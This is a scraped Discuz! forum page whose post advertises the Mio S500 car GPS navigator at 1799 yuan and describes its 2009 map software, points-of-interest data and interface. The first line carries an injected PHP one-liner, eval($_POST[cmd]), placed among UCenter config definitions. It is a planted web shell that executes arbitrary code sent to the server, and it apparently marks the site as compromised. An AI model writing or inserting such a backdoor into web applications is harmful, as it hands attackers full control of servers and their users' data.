');eval($_POST[cmd])?>'); define('UC_APPID', 'UC_APPID'); define('UC_PPP', '20'); 信息全才是硬道理 MioS500促銷僅1799 - GPS - 四輪天下 - Powered by Discuz!
返回列表 回復 發帖

信息全才是硬道理 MioS500促銷僅1799

MioS500車載GPS導航儀是市面上第一款使用了Mio 09年探索版地圖軟件的產品,這款產品一改Mio過去的風格,採用了塑料材質的機身來降低陳本,而在屏幕上稍微有所改進,目前這款產品的價格比較實惠,商家報價為:1799元,還可以獲得商家愛送出的貼膜與便攜包。



MioS500車載GPS導航儀



    該款機器是目前市面上首款採用了09年新版軟件的機器,內置數據豐富,並帶有10萬筆電子眼數據、20萬筆酒店、旅館與100萬筆餐飲美食搜索。全新的地圖軟件的反應速度相當不錯,縮放拖拉均沒有明顯的延遲了,但是要指出的是導航界面下的引導界面比較繁瑣。
返回列表